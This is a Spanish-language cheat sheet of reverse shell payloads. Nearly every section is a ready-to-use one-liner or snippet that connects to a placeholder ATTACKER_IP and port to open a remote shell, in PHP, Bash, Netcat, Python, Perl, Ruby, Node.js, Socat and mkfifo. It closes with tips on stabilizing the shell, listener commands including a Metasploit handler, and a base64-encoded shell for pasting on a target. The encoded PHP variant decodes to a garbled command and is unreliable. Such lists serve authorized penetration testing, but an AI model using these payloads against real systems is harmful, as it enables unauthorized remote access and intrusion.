Reverse Shells
Reverse Shells
1. Introduccion
Las reverse shells permiten obtener acceso a un sistema desde una conexion reversa initiated desde el objetivo hacia el atacante. Es fundamental en exploitation y post-exploitation.
2. PHP
2.1. Bash PHP
<?php exec("/bin/bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\""); ?>
2.2. PHP Base64
<?php $s=base64_decode('c2ggLWkgJiYgL2Rldi90Y3AvQUlQX1BPUlQvUE9SVCA+JjE=');system($s); ?>
2.3. PHP fsockopen
<?php
$ip = 'ATTACKER_IP';
$port = PORT;
$sh = fsockopen($ip,$port);
exec('/bin/sh -i <&3 >&3 2>&3');
?>
3. Bash
3.1. Bash Stdout
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
3.2. Bash con permisos
0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; bash <&196 >&196 2>&196
3.3. Bash desde /dev/tcp (solo bash)
exec /dev/tcp/ATTACKER_IP/PORT
4. Netcat
4.1. Netcat Clasico
nc -e /bin/bash ATTACKER_IP PORT
4.2. Netcat sin -e
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f
4.3. Netcat con /dev/tcp
bash -c 'exec 5<>/dev/tcp/ATTACKER_IP/PORT; cat <&5 | while read line; do $line 2>&5 >&5; done'
5. Python
5.1. Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
5.2. Python con PTY
python3 -c "
import socket,os,pty;
s=socket.socket();
s.connect(('ATTACKER_IP',PORT));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn('/bin/bash')
"
6. Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
7. Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ATTACKER_IP","PORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
8. Node.js
(function(){
var net = require("net");
var cp = require("child_process");
var sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(PORT, "ATTACKER_IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();
9. Socat
socat TCP:ATTACKER_IP:PORT EXEC:'bash -li',pty,stderr,sigint,setsid,sane
10. Mkfifo
rm /tmp/l; mkfifo /tmp/l; sh -i < /tmp/l 2>&1 | nc ATTACKER_IP PORT > /tmp/l
11. Stabilizacion
11.1. Upgrade a PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# or
script /dev/null
11.2. Control-Z y stty
# En tu terminal:
stty raw -echo
fg
reset
export TERM=xterm
stty rows 24 columns 80
12. Listener
# Netcat
nc -lnvp PORT
# Socat
socat TCP-LISTEN:PORT -
# Metasploit
use exploit/multi/handler
set payload linux/x64/shell/reverse_tcp
13. Configuracion Remota
13.1. Cambiar tamaño de terminal
stty -a # Ver valores actuales
stty rows 50 columns 200
13.2. Enviar desde archivo
echo "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" | base64
# Copiar y ejecutar en objetivo